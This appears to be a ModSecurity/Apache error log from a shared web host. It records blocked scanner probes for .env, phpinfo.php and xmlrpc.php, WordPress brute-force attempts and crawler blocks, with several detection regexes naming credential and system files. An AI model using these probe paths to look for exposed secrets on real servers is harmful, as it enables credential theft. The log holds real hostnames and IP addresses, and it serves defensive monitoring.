[Tue May 26 16:39:49.618028 2026] [security2:error] [pid 817651:tid 817710] [remote 74.7.241.58:48114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV_fdlGRCPPN1dS2y2hmQAA4To"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/IXR
[Tue May 26 16:39:50.780366 2026] [security2:error] [pid 817651:tid 817852] [client 195.178.110.34:55238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahV_ftlGRCPPN1dS2y2hrwAAAMw"]
[Tue May 26 16:39:51.934569 2026] [security2:error] [pid 817651:tid 817885] [client 114.119.146.111:51041] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/lateral-bracing-design-example.html"] [unique_id "ahV_f9lGRCPPN1dS2y2hyAAAAO0"], referer: http://whitesun.in/1hfq/lateral-bracing-design-example.html
[Tue May 26 16:39:52.100770 2026] [security2:error] [pid 817651:tid 817699] [remote 195.178.110.34:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/phpinfo.php"] [unique_id "ahV_gNlGRCPPN1dS2y2hzwAAky8"]
[Tue May 26 16:39:52.775387 2026] [security2:error] [pid 817651:tid 817798] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ftlGRCPPN1dS2y2htQAAAJY"]
[Tue May 26 16:39:55.190228 2026] [security2:error] [pid 817651:tid 817811] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_gNlGRCPPN1dS2y2h4QAAAKM"]
[Tue May 26 16:39:56.802858 2026] [security2:error] [pid 817651:tid 817872] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_gtlGRCPPN1dS2y2iAQAAAOA"]
[Tue May 26 16:39:56.993804 2026] [security2:error] [pid 817651:tid 817843] [client 195.178.110.34:39224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahV_hNlGRCPPN1dS2y2iMgAAAMM"]
[Tue May 26 16:39:57.086657 2026] [security2:error] [pid 817651:tid 817899] [client 117.198.37.168:50534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_hNlGRCPPN1dS2y2iMQAAAPs"]
[Tue May 26 16:39:57.086795 2026] [security2:error] [pid 817651:tid 817899] [client 117.198.37.168:50534] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_hNlGRCPPN1dS2y2iMQAAAPs"]
[Tue May 26 16:39:57.576358 2026] [security2:error] [pid 817651:tid 817852] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_g9lGRCPPN1dS2y2iDQAAAMw"]
[Tue May 26 16:39:59.172146 2026] [security2:error] [pid 817651:tid 817788] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_hNlGRCPPN1dS2y2iJwAAAIw"]
[Tue May 26 16:40:00.751307 2026] [security2:error] [pid 817651:tid 817815] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_htlGRCPPN1dS2y2iRwAAAKc"]
[Tue May 26 16:40:02.751917 2026] [security2:error] [pid 817651:tid 817783] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_iNlGRCPPN1dS2y2icQAAAIc"]
[Tue May 26 16:40:04.835117 2026] [security2:error] [pid 817651:tid 817781] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_itlGRCPPN1dS2y2inQAAAIU"]
[Tue May 26 16:40:06.023554 2026] [security2:error] [pid 817651:tid 817846] [client 14.247.147.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_jNlGRCPPN1dS2y2iuAAAAMY"]
[Tue May 26 16:40:06.560457 2026] [security2:error] [pid 817651:tid 817818] [client 195.178.110.34:44366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahV_jtlGRCPPN1dS2y2i5QAAAKo"]
[Tue May 26 16:40:06.840948 2026] [security2:error] [pid 817651:tid 817903] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_jNlGRCPPN1dS2y2iyQAAAP8"]
[Tue May 26 16:40:07.053817 2026] [core:crit] [pid 817651:tid 817873] (13)Permission denied: [client 207.46.13.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:40:07.418187 2026] [security2:error] [pid 817651:tid 817879] [client 117.198.37.168:50848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_j9lGRCPPN1dS2y2jAwAAAOc"]
[Tue May 26 16:40:07.418366 2026] [security2:error] [pid 817651:tid 817879] [client 117.198.37.168:50848] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_j9lGRCPPN1dS2y2jAwAAAOc"]
[Tue May 26 16:40:08.624080 2026] [security2:error] [pid 817651:tid 817816] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_jtlGRCPPN1dS2y2i8QAAAKg"]
[Tue May 26 16:40:10.883271 2026] [security2:error] [pid 817651:tid 817905] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_kNlGRCPPN1dS2y2jIAAAAQE"]
[Tue May 26 16:40:10.972945 2026] [security2:error] [pid 817651:tid 817880] [client 110.249.202.30:38946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahV_ktlGRCPPN1dS2y2jUAAAAOg"]
[Tue May 26 16:40:12.305958 2026] [security2:error] [pid 817651:tid 817724] [remote 185.16.39.114:64801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.39.16.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV_lNlGRCPPN1dS2y2jZwAAukg"]
[Tue May 26 16:40:12.307965 2026] [security2:error] [pid 817651:tid 817752] [remote 185.16.39.114:64801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.39.16.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV_lNlGRCPPN1dS2y2jZgAAumQ"]
[Tue May 26 16:40:12.337538 2026] [security2:error] [pid 817651:tid 817776] [remote 185.16.39.114:64801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.39.16.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV_lNlGRCPPN1dS2y2jZQAAunw"]
[Tue May 26 16:40:12.651684 2026] [security2:error] [pid 817651:tid 817897] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ktlGRCPPN1dS2y2jSQAAAPk"]
[Tue May 26 16:40:14.853131 2026] [security2:error] [pid 817651:tid 817903] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_lNlGRCPPN1dS2y2jdgAAAP8"]
[Tue May 26 16:40:14.933761 2026] [autoindex:error] [pid 817651:tid 817666] [remote 45.148.10.5:43240] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:40:16.426799 2026] [security2:error] [pid 817651:tid 817817] [client 195.178.110.34:37522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahV_mNlGRCPPN1dS2y2jyAAAAKk"]
[Tue May 26 16:40:17.805902 2026] [security2:error] [pid 817651:tid 817886] [client 117.198.37.168:51163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_mdlGRCPPN1dS2y2j5AAAAO4"]
[Tue May 26 16:40:17.806033 2026] [security2:error] [pid 817651:tid 817886] [client 117.198.37.168:51163] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_mdlGRCPPN1dS2y2j5AAAAO4"]
[Tue May 26 16:40:17.981908 2026] [security2:error] [pid 817651:tid 817861] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ltlGRCPPN1dS2y2jpAAAANU"]
[Tue May 26 16:40:18.981651 2026] [security2:error] [pid 817651:tid 817829] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_mNlGRCPPN1dS2y2jwwAAALU"]
[Tue May 26 16:40:19.475986 2026] [security2:error] [pid 817651:tid 817863] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_m9lGRCPPN1dS2y2kBgAAANc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:40:20.929085 2026] [security2:error] [pid 817651:tid 817792] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_nNlGRCPPN1dS2y2kIgAAAJA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 16:40:21.568364 2026] [security2:error] [pid 817651:tid 817864] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_m9lGRCPPN1dS2y2kAAAAANg"]
[Tue May 26 16:40:22.548988 2026] [security2:error] [pid 817651:tid 817831] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_nNlGRCPPN1dS2y2kFAAAALc"]
[Tue May 26 16:40:23.192934 2026] [autoindex:error] [pid 817651:tid 817866] [client 198.235.24.111:62342] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:40:23.445481 2026] [security2:error] [pid 817651:tid 817830] [client 195.178.110.34:46934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahV_n9lGRCPPN1dS2y2kWAAAALY"]
[Tue May 26 16:40:23.904012 2026] [security2:error] [pid 817651:tid 817793] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_n9lGRCPPN1dS2y2kZQAAAJE"], referer: https://anujtradingco.com
[Tue May 26 16:40:24.199138 2026] [core:crit] [pid 817651:tid 817899] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:40:25.128376 2026] [security2:error] [pid 817651:tid 817907] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_n9lGRCPPN1dS2y2kTgAAAQM"]
[Tue May 26 16:40:27.050804 2026] [security2:error] [pid 817651:tid 817844] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_oNlGRCPPN1dS2y2kgAAAAMQ"]
[Tue May 26 16:40:28.370385 2026] [security2:error] [pid 817651:tid 817892] [client 45.148.10.16:49922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "barrados.com.mx.md-74.webhostbox.net"] [uri "/"] [unique_id "ahV_pNlGRCPPN1dS2y2kzwAAAPQ"]
[Tue May 26 16:40:28.490168 2026] [security2:error] [pid 817651:tid 817861] [client 117.198.37.168:51476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_pNlGRCPPN1dS2y2kzAAAANU"]
[Tue May 26 16:40:28.490410 2026] [security2:error] [pid 817651:tid 817861] [client 117.198.37.168:51476] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_pNlGRCPPN1dS2y2kzAAAANU"]
[Tue May 26 16:40:29.110509 2026] [security2:error] [pid 817651:tid 817798] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_o9lGRCPPN1dS2y2krgAAAJY"]
[Tue May 26 16:40:31.729568 2026] [security2:error] [pid 817651:tid 817871] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_pNlGRCPPN1dS2y2k4AAAAN8"]
[Tue May 26 16:40:33.369505 2026] [security2:error] [pid 817651:tid 817901] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ptlGRCPPN1dS2y2k-wAAAP0"]
[Tue May 26 16:40:33.591236 2026] [security2:error] [pid 817651:tid 817839] [client 195.178.110.34:43144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahV_qdlGRCPPN1dS2y2lOQAAAL8"]
[Tue May 26 16:40:34.560854 2026] [security2:error] [pid 817651:tid 817837] [client 181.209.116.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_qNlGRCPPN1dS2y2lEQAAAL0"]
[Tue May 26 16:40:34.644181 2026] [security2:error] [pid 817651:tid 817747] [remote 45.32.67.165:41348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV_qtlGRCPPN1dS2y2lRgAAml8"]
[Tue May 26 16:40:36.077935 2026] [security2:error] [pid 817651:tid 817857] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_qdlGRCPPN1dS2y2lMAAAANE"]
[Tue May 26 16:40:36.127663 2026] [security2:error] [pid 817651:tid 817752] [remote 5.39.1.226:28892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "blettclms.com"] [uri "/robots.txt"] [unique_id "ahV_rNlGRCPPN1dS2y2lZwAA02Q"]
[Tue May 26 16:40:36.127796 2026] [security2:error] [pid 817651:tid 817859] [client 5.39.1.226:28892] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "blettclms.com"] [uri "/robots.txt"] [unique_id "ahV_rNlGRCPPN1dS2y2lZwAA02Q"]
[Tue May 26 16:40:36.251817 2026] [security2:error] [pid 817651:tid 817826] [client 45.148.10.16:39980] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.rathnaa.co.in"] [uri "/"] [unique_id "ahV_rNlGRCPPN1dS2y2lawAAALI"]
[Tue May 26 16:40:37.554195 2026] [security2:error] [pid 817651:tid 817901] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_q9lGRCPPN1dS2y2lVgAAAP0"]
[Tue May 26 16:40:37.586228 2026] [security2:error] [pid 817651:tid 817712] [remote 51.161.37.81:50376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "blettclms.com"] [uri "/"] [unique_id "ahV_rdlGRCPPN1dS2y2lhgAAlTw"]
[Tue May 26 16:40:37.586484 2026] [security2:error] [pid 817651:tid 817797] [client 51.161.37.81:50376] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "blettclms.com"] [uri "/"] [unique_id "ahV_rdlGRCPPN1dS2y2lhgAAlTw"]
